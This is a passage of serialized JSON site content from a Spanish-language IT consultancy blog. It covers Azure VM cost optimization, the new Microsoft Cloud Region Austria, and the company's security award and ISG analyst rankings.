mensaje!",{"image":3252,"cloudinary":2180,"alt":3253,"name":3254,"quotee":2499,"details":3745},[3746,3747],{"text":2927,"href":2928,"details":2929,"icon":2815},{"text":2806,"href":3258,"icon":2819},{"ctaText":2212,"cta":3749,"method":2168,"action":2215,"fields":3750},{"skin":2214},[3751,3752,3753,3754,3755,3756,3757],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":2825},{"label":2936,"type":61,"id":2223,"required":2180,"requiredMsg":2827},{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":2830},{"label":2939,"type":2236,"id":2237,"required":2180,"requiredMsg":2940},{"type":2240,"id":2246,"value":3267},{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},[3759,3761],{"lang":2260,"href":3760},"/blog/security/2024/10/end-of-support-operating-systems-de",{"lang":2257,"href":3762},"/blog/security/2024/10/end-of-support-operating-systems-en",{"slick":2180,"form":2180},"/posts/2024-10-17-end-of-support-operating-systems",{"title":3444,"description":65},"posts/2024-10-17-end-of-support-operating-systems",[3768,3769,3770,3771,3772],"Cyber Security","Windows Server","Security Risk","Vulnerability Management","Security Score","cxQEsVesijycRyhPconWu7DHHCtszwA_A3Yg7OLh60g",{"id":3775,"title":3776,"author":3777,"body":3778,"cta":2165,"description":3784,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":4056,"moment":4058,"navigation":2180,"path":4070,"seo":4071,"stem":4072,"tags":4073,"webcast":2167,"__hash__":4077},"content_es/posts/2024-11-11-vm-cost-optimization-on-azure.md","Cómo mantener bajo control los costos de tus VM en Azure",[2509],{"type":9,"value":3779,"toc":4046},[3780,3785,3788,3792,3794,3797,3800,3814,3820,3824,3826,3829,3840,3843,3846,3855,3864,3868,3870,3873,3877,3879,3882,3885,3893,3899,3907,3912,3921,3927,3931,3933,3936,3944,3949,3957,3968,3976,3993,3997,3999,4002,4016,4022,4025,4028,4033,4036,4040,4043],[12,3781,3782],{},[251,3783,3784],{},"\"¿Por qué cuestan tanto mis máquinas virtuales (VMs) en Azure? ¡Pensé que la nube era más económica!\"",[12,3786,3787],{},"Este es un comentario que escuchamos frecuentemente de nuestros clientes, especialmente de aquellos que migraron su infraestructura de TI a la nube con un enfoque de \"Lift & Shift\" sin realizar ajustes. Sin las optimizaciones adecuadas, la nube puede resultar más costosa de lo esperado.",[41,3789,3791],{"id":3790},"realmente-necesitas-una-vm","¿Realmente necesitas una VM?",[12,3793,31],{},[12,3795,3796],{},"Esta es la primera pregunta que deberías plantearte: ¿La tarea requiere realmente una VM, o un servicio nativo de la nube como Azure Functions o un clúster de Kubernetes sería una mejor opción?",[12,3798,3799],{},"Sin embargo, existen buenas razones para optar por una VM:",[1255,3801,3802,3805,3808,3811],{},[1258,3803,3804],{},"Requisitos de los proveedores de software",[1258,3806,3807],{},"Falta de conocimiento en la empresa para modernizar aplicaciones",[1258,3809,3810],{},"Escasez de personal",[1258,3812,3813],{},"Otras necesidades específicas",[12,3815,3816,3817,3819],{},"Entonces, ¿cómo optimizar los costos si no se puede prescindir de una VM?",[531,3818],{},"\nA continuación, te presentamos estrategias efectivas.",[41,3821,3823],{"id":3822},"principales-factores-que-influyen-en-los-costos-de-las-vms","Principales factores que influyen en los costos de las VMs",[12,3825,31],{},[12,3827,3828],{},"Los costos de las VMs en Azure están principalmente determinados por los siguientes factores:",[1255,3830,3831,3834,3837],{},[1258,3832,3833],{},"Tiempo de ejecución",[1258,3835,3836],{},"SKU asignado (Tamaño de la máquina virtual)",[1258,3838,3839],{},"Licencias del sistema operativo",[12,3841,3842],{},"El costo principal proviene de los recursos utilizados durante el tiempo de ejecución. Mientras una VM esté activa y consuma recursos de CPU y RAM, se generarán costos, independientemente de si está completamente utilizada o en inactividad. Cuando una VM está apagada, los costos se limitan al almacenamiento utilizado.",[12,3844,3845],{},"Cada VM en Azure está asociada con un SKU específico, que describe su configuración en términos de CPU y RAM. Diferentes SKUs están optimizados para distintos escenarios de uso, como una alta proporción de núcleos de CPU a RAM para tareas intensivas en cálculo.",[12,3847,3848,3849,3851,3854],{},"El nombre del SKU usualmente proporciona información sobre su configuración.",[531,3850],{},[251,3852,3853],{},"Ejemplo:"," Una VM de la serie D está diseñada para un equilibrio entre CPU y RAM, típicamente 4 GB de RAM por núcleo de CPU. Por ejemplo, Standard_D4s_v5 ofrece 4 núcleos de CPU y 16 GB de RAM. La \"s\" indica compatibilidad con almacenamiento SSD premium.",[12,3856,3857,3858,3863],{},"Microsoft ofrece una ",[2630,3859,3862],{"href":3860,"rel":3861},"https://learn.microsoft.com/es-es/azure/virtual-machines/sizes/overview?tabs=breakdownseries%2Cgeneralsizelist%2Ccomputesizelist%2Cmemorysizelist%2Cstoragesizelist%2Cgpusizelist%2Cfpgasizelist%2Chpcsizelist",[3135],"lista completa"," de todos los SKUs disponibles, con detalles sobre su rendimiento.",[41,3865,3867],{"id":3866},"cómo-optimizar-los-costos-de-las-vms","Cómo optimizar los costos de las VMs",[12,3869,31],{},[12,3871,3872],{},"Para reducir los costos de las VMs, considera analizar estos aspectos:",[186,3874,3876],{"id":3875},"asignación-de-recursos","Asignación de recursos",[12,3878,47],{},[12,3880,3881],{},"La primera pregunta clave es: ¿Está la VM asignada al SKU óptimo?",[12,3883,3884],{},"Para responder a esta pregunta, consulta las métricas de la VM en el portal de Azure. Esto puede revelar que el tamaño de la VM está sobredimensionado, o que los recursos solo se utilizan plenamente en ciertos momentos, dejando la VM inactiva el resto del tiempo. También puede ocurrir que la VM esté asignada a una serie de SKU inadecuada, y que una variante con más RAM por núcleo de CPU sea más adecuada.",[12,3886,3887,3890,3892],{},[251,3888,3889],{},"Ejemplo: Uso intermitente",[531,3891],{},"\nUn escenario típico: ejecuciones mensuales de facturación en un sistema ERP. La VM se utiliza intensivamente una vez al mes para procesar facturas, pero el resto del tiempo solo se usa para consultas de datos esporádicas y menos exigentes.",[12,3894,3895,3898],{},[251,3896,3897],{},"Solución:"," Reducir el tamaño de la VM durante la mayor parte del mes y aumentarlo temporalmente durante las ejecuciones de facturación. Azure permite realizar estos ajustes dentro de la misma serie con tiempo de inactividad mínimo.",[12,3900,3901,3904,3906],{},[251,3902,3903],{},"Ejemplo: SKU inadecuado",[531,3905],{},"\nOtro caso: Una aplicación necesita 64 GB de RAM, pero solo 4 núcleos de CPU. Si la VM está configurada como Standard_D16s_v5, incluye 16 núcleos de CPU, excediendo por mucho las necesidades.",[12,3908,3909,3911],{},[251,3910,3897],{}," Cambiar a un SKU como Standard_E8-4s_v5 proporcionaría los mismos 64 GB de RAM con solo 4 núcleos de CPU.",[12,3913,3914,3915,3920],{},"Usando el ",[2630,3916,3919],{"href":3917,"rel":3918},"https://azure.microsoft.com/es-es/pricing/calculator/",[3135],"Calculador de precios de Azure",", puedes identificar rápidamente los ahorros potenciales. Las diferencias mensuales pueden superar los 500 euros.",[12,3922,3923],{},[2772,3924],{"alt":3925,"src":3926},"Comparación de costos de VMs","https://res.cloudinary.com/c4a8/image/upload/blog/pics/vm-cost-optimization.png",[186,3928,3930],{"id":3929},"optimización-del-tiempo-de-ejecución-de-las-vms","Optimización del tiempo de ejecución de las VMs",[12,3932,47],{},[12,3934,3935],{},"En la nube, las VMs generan costos según el uso activo de CPU y RAM. En entornos locales, las VMs solían operar 24/7 sin que esto afectara mucho los costos. En la nube, sin embargo, surge la pregunta: ¿Es necesario que la VM funcione 24/7?",[12,3937,3938,3941,3943],{},[251,3939,3940],{},"Ejemplo: Uso 12/5",[531,3942],{},"\nImagina una VM cuya aplicación no se utiliza durante las noches ni los fines de semana. No se requiere disponibilidad continua.",[12,3945,3946,3948],{},[251,3947,3897],{}," Configura la VM para que se apague en horarios no laborales. Es importante considerar la gestión de actualizaciones para evitar riesgos de seguridad. Con Azure Automation Accounts, puedes automatizar el inicio y apagado de VMs en horarios predefinidos.",[12,3950,3951,3954,3956],{},[251,3952,3953],{},"Ejemplo: Uso 24/7",[531,3955],{},"\nAlgunos sistemas, como controladores de dominio, necesitan estar disponibles constantemente para responder a usuarios, clientes y servidores.",[12,3958,3959,3961,3962,3967],{},[251,3960,3897],{}," En estos casos, ",[2630,3963,3966],{"href":3964,"rel":3965},"https://azure.microsoft.com/es-es/pricing/reserved-vm-instances/",[3135],"Azure Reserved Instances"," son ideales. Las organizaciones pueden reservar recursos de computación por 1 a 3 años con una tarifa reducida. El pago puede ser mensual o anticipado. Además, las Reserved Instances pueden aplicarse a otras VMs con el mismo SKU cuando están disponibles.",[12,3969,3970,3973,3975],{},[251,3971,3972],{},"Ejemplo: Modernización planificada",[531,3974],{},"\nEn algunos casos, se necesitan VMs mientras se planea una transición a servicios nativos de la nube, como Azure Functions o clústeres de Kubernetes. Si esta migración se prevé en menos de tres meses, las Reserved Instances podrían no ser rentables.",[12,3977,3978,3980,3981,3986,3987,3992],{},[251,3979,3897],{}," El ",[2630,3982,3985],{"href":3983,"rel":3984},"https://learn.microsoft.com/es-es/azure/cost-management-billing/savings-plan/savings-plan-compute-overview",[3135],"Azure Savings Plan"," es una alternativa flexible. Similar a las Reserved Instances, abarca de 1 a 3 años, pero cubre una gama más amplia de ",[2630,3988,3991],{"href":3989,"rel":3990},"https://azure.microsoft.com/es-es/pricing/offers/savings-plan-compute/#Select-services",[3135],"servicios de Azure",". Las empresas se comprometen a gastar un monto fijo por hora, obteniendo tarifas reducidas para servicios elegibles hasta ese límite. Los costos que excedan el compromiso se facturan a las tarifas estándar.",[186,3994,3996],{"id":3995},"licencias","Licencias",[12,3998,47],{},[12,4000,4001],{},"Un factor a menudo subestimado en la optimización de costos son las licencias del sistema operativo. Cuando se crea una VM en Azure, Microsoft proporciona por defecto una licencia de alquiler para el sistema operativo. Sin embargo, muchas organizaciones ya cuentan con licencias existentes.",[12,4003,4004,4007,4009,4010,4015],{},[251,4005,4006],{},"Solución: Azure Hybrid Benefit",[531,4008],{},"\nCon ",[2630,4011,4014],{"href":4012,"rel":4013},"https://azure.microsoft.com/es-es/pricing/hybrid-benefit/",[3135],"Azure Hybrid Benefit",", puedes usar licencias existentes, como Windows Server, en tus VMs de Azure.",[12,4017,4018],{},[2772,4019],{"alt":4020,"src":4021},"Azure Hybrid Benefit Windows Server","https://res.cloudinary.com/c4a8/image/upload/blog/pics/azure_hybrid_benefit_ms_picture_windows_server.png",[12,4023,4024],{},"Esta opción también está disponible para sistemas licenciados de terceros como Red Hat, SUSE Enterprise y Microsoft SQL Server.",[12,4026,4027],{},"El uso de licencias existentes en Azure está sujeto a ciertos requisitos. Una vez cumplidos, puedes activar el Hybrid Benefit fácilmente desde la configuración de la VM. Los beneficios son evidentes: una comparación entre VMs con y sin Hybrid Benefit resalta el ahorro potencial.",[12,4029,4030],{},[2772,4031],{"alt":4014,"src":4032},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/azure-hybrid-benefit.png",[12,4034,4035],{},"Vale la pena verificar si tus licencias actuales califican para el Azure Hybrid Benefit.",[41,4037,4039],{"id":4038},"conclusion","Conclusion",[12,4041,4042],{},"Un análisis detallado de la asignación de recursos, la optimización del tiempo de ejecución y el uso de licencias existentes son pasos clave para reducir costos. También es importante considerar alternativas a las VMs y explorar servicios nativos de la nube. Herramientas como el Calculador de precios de Azure, Azure Automation y opciones como Azure Hybrid Benefit te ayudarán a identificar oportunidades de ahorro.",[12,4044,4045],{},"Para tener éxito en la nube a largo plazo, es fundamental evaluar continuamente los costos y los beneficios, y estar dispuesto a optimizar la infraestructura según sea necesario.",{"title":65,"searchDepth":111,"depth":111,"links":4047},[4048,4049,4050,4055],{"id":3790,"depth":111,"text":3791},{"id":3822,"depth":111,"text":3823},{"id":3866,"depth":111,"text":3867,"children":4051},[4052,4053,4054],{"id":3875,"depth":329,"text":3876},{"id":3929,"depth":329,"text":3930},{"id":3995,"depth":329,"text":3996},{"id":4038,"depth":111,"text":4039},{"lang":2170,"seoTitle":4057,"titleClass":2172,"date":4058,"categories":4059,"blogtitlepic":4060,"socialimg":4061,"customExcerpt":4062,"keywords":4063,"hreflang":4064,"scripts":4069},"Optimiza los costos de las VM en Azure: Los mejores consejos y estrategias","2024-11-11",[3243],"head-vm-cost-optimization","/blog/heads/head-vm-cost-optimization.jpg","Las máquinas virtuales (VMs) en Azure pueden ser más costosas de lo esperado, especialmente sin una optimización adecuada. Este artículo te guía a través de estrategias como elegir la SKU correcta, optimizar tiempos de ejecución y aprovechar licencias existentes para reducir costos y mejorar la eficiencia a largo plazo.","Costos de Azure VM, optimización de costos en la nube, máquinas virtuales, SKU de Azure, Azure Hybrid Benefit, servicios nativos en la nube, optimización de costos en Azure, optimización de tiempos de ejecución de VM, Azure Reserved Instances, Azure Automation",[4065,4067],{"lang":2257,"href":4066},"/blog/azure/2024/11/vm-cost-optimization-on-azure-en",{"lang":2260,"href":4068},"/blog/azure/2024/11/vm-cost-optimization-on-azure",{"slick":2180,"form":2180},"/posts/2024-11-11-vm-cost-optimization-on-azure",{"title":3776,"description":3784},"posts/2024-11-11-vm-cost-optimization-on-azure",[4074,4075,4076],"Azure Automation","Tecnología en la Nube","Optimización de Costos en Azure","GeFrKMVlWukrdr2y_vn7sD_pDzhKbLvBMZCkgIqORfY",{"id":4079,"title":4080,"author":4081,"body":4082,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":4158,"moment":4160,"navigation":2180,"path":4206,"seo":4207,"stem":4208,"tags":4209,"webcast":2167,"__hash__":4213},"content_es/posts/2025-03-12-azure-goes-austria.md","Hello Clöud",[2534],{"type":9,"value":4083,"toc":4154},[4084,4088,4090,4093,4119,4122,4126,4128,4131,4151],[41,4085,4087],{"id":4086},"una-región-de-la-nube-que-lo-cambia-todo","¡Una Región de la Nube que lo Cambia Todo!",[12,4089,31],{},[12,4091,4092],{},"Ahora hay una respuesta a todos estos desafíos: Microsoft está construyendo su propia región de la nube en Austria con centros de datos de última generación y máximo rendimiento. Esto significa para ti: ¡Ahora obtienes el poder global de una nube pública con la seguridad del almacenamiento de datos local!",[1255,4094,4095,4101,4107,4113],{},[1258,4096,4097,4100],{},[251,4098,4099],{},"Máximo Rendimiento:"," menor latencia, mayor escalabilidad, más eficiencia",[1258,4102,4103,4106],{},[251,4104,4105],{},"Almacenamiento de Datos Local:"," todos los datos permanecen en Austria – seguros, conformes y protegidos",[1258,4108,4109,4112],{},[251,4110,4111],{},"Mayor Seguridad y Resiliencia:"," infraestructura de última generación con múltiples capas de seguridad",[1258,4114,4115,4118],{},[251,4116,4117],{},"TI Sostenible:"," hasta un 93% más eficiente en energía que los centros de datos tradicionales",[12,4120,4121],{},"Pero una región de la nube por sí sola no es suficiente – el socio adecuado marca la diferencia. Aquí es donde entramos nosotros, glueckkanja.",[41,4123,4125],{"id":4124},"te-preparamos-para-el-futuro-local-de-tu-ti","¡Te Preparamos para el Futuro Local de tu TI!",[12,4127,31],{},[12,4129,4130],{},"En Alemania, somos uno de los principales socios de Microsoft para la migración a la nube. Ahora, nuestra experiencia también está disponible en la nueva Microsoft Cloud Region Austria. Como socio estratégico, llevamos tu empresa a la nube de manera fluida. ¿Tienes preguntas sobre la protección de datos, la migración de sistemas o los beneficios financieros disponibles? Estamos aquí para ti y te acompañamos desde los primeros pasos hasta el lanzamiento final (y con gusto más allá). Tus beneficios:",[1255,4132,4133,4139,4145],{},[1258,4134,4135,4138],{},[251,4136,4137],{},"Implementación de Blueprint y Landing Zone:"," ¡Te permitimos migrar de manera segura, rápida y sin problemas!",[1258,4140,4141,4144],{},[251,4142,4143],{},"Financiamiento AMM:"," ¡Te proporcionamos información completa sobre los fondos de Microsoft para una transición rentable!",[1258,4146,4147,4150],{},[251,4148,4149],{},"Transición Sin Problemas:"," ¡Te acompañamos paso a paso a la nueva AT-Cloud con soluciones estandarizadas!",[12,4152,4153],{},"Aprovecha ahora nuestra experiencia de más de 100 migraciones exitosas a la nube y nuestra experiencia de primera clase con Microsoft.",{"title":65,"searchDepth":111,"depth":111,"links":4155},[4156,4157],{"id":4086,"depth":111,"text":4087},{"id":4124,"depth":111,"text":4125},{"lang":2170,"seoTitle":4159,"titleClass":2172,"date":4160,"categories":4161,"blogtitlepic":4162,"socialimg":4163,"customExcerpt":4164,"keywords":4165,"contactInContent":4166,"hreflang":4200,"scripts":4205,"published":2180},"Microsoft Cloud Region Austria: Potencia de la Nube Local para tu Empresa","2025-03-12",[3243],"head-azure-goes-austria","/blog/heads/head-azure-goes-austria.png","Las empresas austriacas se encuentran actualmente en un punto de inflexión. La digitalización está acelerándose rápidamente. Al mismo tiempo, aumentan las demandas de seguridad informática, velocidad y flexibilidad, así como los desafíos relacionados con los costos, las barreras regulatorias y el uso de nuevas tecnologías.","Microsoft Cloud Region Austria, Migración a la Nube Austria, almacenamiento de datos local, Seguridad en la Nube, Socio de Microsoft Austria, Rendimiento en la Nube, TI sostenible, Soluciones en la Nube Austria, Migración a Azure, Implementación de Landing Zone",{"quote":2180,"infos":4167},{"bgColor":2200,"headline":4168,"subline":4169,"level":41,"textStyling":2203,"flush":2204,"person":4170,"form":4177},"¡Ponte en Contacto Ahora!","¿Quieres saber más sobre cómo podemos llevar tu empresa de manera fluida y segura a la nueva Microsoft Cloud Region Austria? Nos complace presentarte nuestra oferta personalmente, responder a tus preguntas sobre protección de datos y migración, y guiarte paso a paso en tu camino hacia la nube. ¡Asegura tu consulta personal ahora!",{"image":4171,"cloudinary":2180,"alt":2534,"name":2534,"quotee":2534,"quoteeTitle":4172,"quote":4173,"detailsHeader":2809,"details":4174},"/people/people-florian-stoeckl.jpg","Azure Lead","La nueva Microsoft Cloud Region Austria es un verdadero cambio de juego: almacenamiento de datos local combinado con la potencia global de la nube, una mezcla imbatible para la seguridad, el rendimiento y la innovación. Con nuestra amplia experiencia, nos aseguramos de que las empresas austriacas puedan aprovechar al máximo esta oportunidad.",[4175,4176],{"text":2812,"href":2813,"details":2929,"icon":2815},{"text":2806,"href":3258,"icon":2819},{"ctaText":2212,"cta":4178,"method":2168,"action":2215,"fields":4179},{"skin":2214},[4180,4182,4184,4187,4190,4193,4194,4196,4198,4199],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":4181},"Por favor, introduce tu nombre.",{"label":2222,"type":61,"id":2223,"required":2180,"requiredMsg":4183},"Por favor, introduce tu empresa.",{"label":4185,"type":2227,"id":2227,"required":2180,"requiredMsg":4186},"Correo Electrónico*","Por favor, introduce tu correo electrónico.",{"label":4188,"type":2231,"id":2232,"required":2180,"requiredMsg":4189},"Tu Mensaje para Nosotros*","Por favor, introduce un mensaje.",{"label":4191,"type":2236,"id":2237,"required":2180,"requiredMsg":4192},"Tus datos serán almacenados con nosotros para procesar y responder a tu solicitud. Para más información sobre la protección de datos, consulta nuestra \u003Ca href=\"/de/datenschutz\">política de privacidad\u003C/a>.","Por favor, confirma",{"type":2240,"id":2241,"value":3243},{"type":2240,"id":2243,"value":4195},"AT",{"type":2240,"id":2246,"value":4197},"Formulario: Blog Hello Clöud | ES",{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},[4201,4203],{"lang":2257,"href":4202},"/blog/azure/2025/03/azure-goes-austria-en",{"lang":2170,"href":4204},"/blog/azure/2025/03/azure-goes-austria-es",{"slick":2180},"/posts/2025-03-12-azure-goes-austria",{"title":4080,"description":65},"posts/2025-03-12-azure-goes-austria",[3243,4210,4211,4212],"Cloud Migration","IT Infrastructure","Austria","5NiLMIHgRgsEfGGh2LXQn0eUbd6CinmqJwge87pC6s0",{"id":4215,"title":4216,"author":4217,"body":4218,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":4274,"moment":4275,"navigation":2180,"path":4287,"seo":4288,"stem":4289,"tags":4290,"webcast":2167,"__hash__":4291},"content_es/posts/2025-04-29-rsa-mssp-2025.md","glueckkanja sigue entre los 5 principales MSSP a nivel mundial",[2460],{"type":9,"value":4219,"toc":4270},[4220,4224,4226,4229,4232,4235,4238,4249,4252,4255,4258,4262,4264,4267],[41,4221,4223],{"id":4222},"tres-años-seguidos-glueckkanja-entre-la-élite-de-la-seguridad","Tres años seguidos: glueckkanja entre la élite de la seguridad",[12,4225,31],{},[12,4227,4228],{},"Por tercer año consecutivo, estamos entre los cinco mejores Managed Microsoft Security Providers del mundo. Un triplete que nos hace muchísima ilusión.\nNuestro CEO Christian Kanja y nuestro Head of Security Jan Geisbauer estuvieron en San Francisco para celebrar este premio junto a la Microsoft Intelligent Security Association (MISA) y la comunidad internacional de seguridad. RSA, el Golden Gate, la alfombra roja – no faltó de nada.",[12,4230,4231],{},"Y como la innovación no solo pasa sobre el escenario, Christian y Jan también respiraron un poco de futuro: recorrieron las calles de San Francisco en un taxi autónomo. Sin conductor, pero con un montón de entusiasmo – una experiencia que encajó a la perfección con el espíritu de la RSA.\nJusto eso es lo que buscamos también en ciberseguridad: la confianza nace cuando los sistemas cumplen lo que prometen.",[12,4233,4234],{},"Los Microsoft Security Excellence Awards son uno de los reconocimientos más importantes del sector. Premian a socios que marcan la diferencia con innovación y calidad de servicio. Que nos hayan vuelto a reconocer en 2025 como uno de los mejores Managed Security Service Providers es un hito especial para nosotros – y una gran confirmación del trabajo diario de todo nuestro equipo.",[12,4236,4237],{},"Lo que nos ha llevado hasta aquí:",[1255,4239,4240,4243,4246],{},[1258,4241,4242],{},"El 87 % de nuestros clientes valoran nuestra experiencia técnica al más alto nivel",[1258,4244,4245],{},"El 94 % destacan nuestros servicios 24/7",[1258,4247,4248],{},"El 100 % están satisfechos con su experiencia global",[12,4250,4251],{},"Resultados contundentes que demuestran que, como equipo, estamos logrando cosas extraordinarias.",[12,4253,4254],{},"Un enorme gracias a todos los que han hecho posible este éxito: a Microsoft y a la Microsoft Intelligent Security Association (MISA) por su colaboración cercana y su confianza, a nuestros clientes por su fidelidad, y a nuestro equipo CSOC, que da lo mejor de sí cada día.",[12,4256,4257],{},"En una comunidad de seguridad fuerte, las mejores mentes trabajan juntas – y esa colaboración es lo que nos impulsa a seguir avanzando.",[41,4259,4261],{"id":4260},"mirando-hacia-adelante","Mirando hacia adelante",[12,4263,31],{},[12,4265,4266],{},"Este premio es para nosotros tanto una motivación como una responsabilidad. Seguimos adelante: con innovación, pasión y el objetivo de ofrecer soluciones de seguridad de Microsoft al más alto nivel. Junto a Microsoft, nuestros clientes y socios, vamos a escribir el próximo capítulo de nuestra historia de éxito.",[12,4268,4269],{},"glueckkanja – Seguridad de nivel Champions League.",{"title":65,"searchDepth":111,"depth":111,"links":4271},[4272,4273],{"id":4222,"depth":111,"text":4223},{"id":4260,"depth":111,"text":4261},{"lang":2170,"seoTitle":4216,"titleClass":2172,"date":4275,"categories":4276,"blogtitlepic":4277,"socialimg":4278,"customExcerpt":4279,"keywords":4280,"hreflang":4281,"scripts":4286},"2025-04-29",[2663],"head-rsa-2025","/socialimg/og-img-mssp-2025.png","Los Microsoft Security Excellence Awards son uno de los mayores reconocimientos del sector. En la RSA Conference 2025 de San Francisco, se premió una vez más a socios que marcan estándares de innovación, calidad de servicio y compromiso. Nos alegra enormemente que glueckkanja haya vuelto a ser finalista en los 'Security MSSP of the Year Awards' en 2025: un gran reconocimiento al trabajo que todo nuestro equipo realiza cada día.","Microsoft Security Excellence Awards 2025, Security MSSP of the Year 2025, Managed Security Service Provider, Cyber Security Microsoft, Microsoft Security Partner, Mejor Partner de Seguridad de Microsoft 2025, Finalista Microsoft MSSP 2025, Ganador del Microsoft Security Award, Proveedor de Ciberseguridad con tecnología de Microsoft, Seguridad gestionada para Microsoft 365, Partner de la Microsoft Intelligent Security Association (MISA), RSA Conference 2025 San Francisco, Security Excellence Awards Microsoft, Partner MISA Microsoft, Soluciones de seguridad empresarial Microsoft, Tendencias de ciberseguridad 2025",[4282,4284],{"lang":2257,"href":4283},"/blog/corporate/202504/rsa-mssp-2025-en",{"lang":2260,"href":4285},"/blog/corporate/202504/rsa-mssp-2025",{"slick":2180},"/posts/2025-04-29-rsa-mssp-2025",{"title":4216,"description":65},"posts/2025-04-29-rsa-mssp-2025",[2719,2720,2175,2721],"_daCkmcHdhEfYZ9x_kQtjQ3UnD9m9cJOvUwJgrvDQsA",{"id":4293,"title":4294,"author":4295,"body":4296,"cta":2165,"description":4300,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":4392,"moment":4394,"navigation":2180,"path":4450,"seo":4451,"stem":4452,"tags":4453,"webcast":2167,"__hash__":4455},"content_es/posts/2025-05-08-isg-germany-2025.md","Cuatro veces seguidas. glueckkanja vuelve a liderar en ISG",[2460],{"type":9,"value":4297,"toc":4385},[4298,4301,4304,4308,4310,4313,4317,4319,4325,4331,4335,4337,4343,4348,4352,4354,4360,4365,4369,4371,4377,4382],[12,4299,4300],{},"Dicen que una vez no cuenta. Dos veces es buena señal. Pero a la tercera ya estás en el mapa. Y si vamos por la cuarta, no hay duda: glueckkanja se ha consolidado como un referente en el estudio ISG Provider Lens™. Tras ser nombrados Líder en 2021, 2023 y 2024, volvemos a estar entre los mejores en 2025 – tanto en Microsoft 365 Services como en Managed Azure.",[12,4302,4303],{},"Como socio de Microsoft con años de experiencia, ayudamos a empresas de todo el mundo a dar el salto a la nube – con visión estratégica, seguridad y siempre con los pies en la tierra. Así contribuimos a la seguridad IT global e impulsamos la innovación en numerosos sectores. Nos alegra ver que ISG sigue reconociendo ese esfuerzo.",[41,4305,4307],{"id":4306},"estudio-isg-provider-lens-2025","Estudio ISG Provider Lens™ 2025",[12,4309,31],{},[12,4311,4312],{},"Con su estudio “Microsoft Cloud Ecosystem”, ISG ofrece valiosas perspectivas dentro de su serie Provider Lens™, ayudando a las organizaciones a orientar su estrategia – desde el posicionamiento hasta asociaciones y estrategias de salida al mercado. Los proveedores se evalúan según su portafolio y competitividad en el ecosistema Microsoft Cloud, y se sitúan en uno de los cuatro cuadrantes: Product Challenger, Contender, Market Challenger y Leader. Pero basta de teoría – veamos cómo nos fue.",[41,4314,4316],{"id":4315},"glueckkanja-es-líder-en-microsoft-365-services-midmarket","glueckkanja es Líder en Microsoft 365 Services (Midmarket)",[12,4318,31],{},[12,4320,4321],{},[2772,4322],{"alt":4323,"src":4324},"Microsoft 365 Services - Midmarket","https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-m365-services-midmarket.png",[12,4326,4327],{},[4328,4329,4330],"em",{},"\"glueckkanja lidera la transformación cloud, integra Microsoft 365 y Windows 365 con eficiencia y apuesta por la automatización para optimizar procesos IT y garantizar la seguridad.\"",[41,4332,4334],{"id":4333},"glueckkanja-es-líder-en-microsoft-365-services-large-accounts","glueckkanja es Líder en Microsoft 365 Services (Large Accounts)",[12,4336,31],{},[12,4338,4339],{},[2772,4340],{"alt":4341,"src":4342},"Microsoft 365 Services - Large Enterprises","https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-m365-services-large-accounts.png",[12,4344,4345],{},[4328,4346,4347],{},"\"glueckkanja optimiza entornos IT complejos, integra Microsoft 365 y Windows 365 de forma fluida y apuesta por la automatización para lograr máxima escalabilidad, seguridad y eficiencia.\"",[41,4349,4351],{"id":4350},"glueckkanja-es-líder-en-managed-services-for-azure-midmarket","glueckkanja es Líder en Managed Services for Azure (Midmarket)",[12,4353,31],{},[12,4355,4356],{},[2772,4357],{"alt":4358,"src":4359},"Managed Services for Azure - Midmarket","https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-managed-services-for-azure-midmarket.png",[12,4361,4362],{},[4328,4363,4364],{},"\"glueckkanja ofrece infraestructuras cloud seguras y escalables que reducen riesgos y aumentan la eficiencia. Gracias a la automatización y una gobernanza proactiva, las empresas ganan estabilidad, control y visión de futuro.\"",[41,4366,4368],{"id":4367},"glueckkanja-es-líder-en-managed-services-for-azure-large-accounts","glueckkanja es Líder en Managed Services for Azure (Large Accounts)",[12,4370,31],{},[12,4372,4373],{},[2772,4374],{"alt":4375,"src":4376},"Managed Services for Azure - Large Enterprises","https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-managed-services-for-azure-large-accounts.png",[12,4378,4379],{},[4328,4380,4381],{},"\"glueckkanja está marcando el futuro de la nube con automatización, gobernanza y sostenibilidad. Con Infrastructure as Code y una optimización iterativa, desarrollamos soluciones resilientes, escalables y rentables.\"",[12,4383,4384],{},"Solo nos queda decir: gracias por tanta confianza. Si quieres echar un vistazo más a fondo a los resultados del estudio, estaremos encantados de enviarte el resumen completo de ISG.",{"title":65,"searchDepth":111,"depth":111,"links":4386},[4387,4388,4389,4390,4391],{"id":4306,"depth":111,"text":4307},{"id":4315,"depth":111,"text":4316},{"id":4333,"depth":111,"text":4334},{"id":4350,"depth":111,"text":4351},{"id":4367,"depth":111,"text":4368},{"lang":2170,"seoTitle":4393,"titleClass":2172,"date":4394,"categories":4395,"blogtitlepic":4396,"socialimg":4397,"customExcerpt":4398,"keywords":4399,"hreflang":4400,"footer":4405,"contactInContent":4406,"textImageTeaser":4438},"ISG 2025: glueckkanja vuelve a ser nombrado Líder en Managed Services for Azure y Microsoft 365 Services","2025-05-08",[2663],"head-isg-2025.png","/blog/heads/head-isg-2025.png","El estudio ISG Provider Lens™ 2025 vuelve a reconocer a glueckkanja como Líder en las categorías Managed Services for Azure y Microsoft 365 Services. Premiados tanto en el segmento Midmarket como en Large Accounts, queda claro lo que se ha ido confirmando en los últimos años: cuando se trata de estandarización, automatización y escalabilidad en entornos Microsoft, glueckkanja es el socio ideal.","Microsoft partner Alemania, Managed Services Azure Alemania, Microsoft 365 Services Alemania, proveedor de servicios IT Alemania, servicios cloud Alemania, ISG Provider Lens Alemania, glueckkanja Alemania, Microsoft cloud Alemania, ISG Líder 2025, seguridad informática Alemania, transformación digital Alemania, servicios Azure Alemania, 